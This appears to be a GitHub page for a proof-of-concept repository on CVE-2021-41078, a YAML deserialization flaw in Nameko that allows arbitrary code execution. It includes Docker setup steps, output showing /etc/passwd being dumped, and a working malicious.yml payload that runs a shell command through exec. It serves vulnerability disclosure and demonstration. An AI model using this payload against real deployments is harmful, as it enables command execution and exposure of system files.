Skip to content

nameko Arbitrary code execution due to YAML deserialization

License

Notifications You must be signed in to change notification settings

s-index/CVE-2021-41078

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-41078

nameko Arbitrary code execution due to YAML deserialization

NVD Description

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Demo

cve-2021-41078

Set Up

  1. Build an image from a Dockerfile
docker build -t cve-2021-41078 .
  1. Run python main.py in a new container
docker run -it --rm cve-2021-41078

output /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC Payload

malicious.yml

!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Reference

About

nameko Arbitrary code execution due to YAML deserialization

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published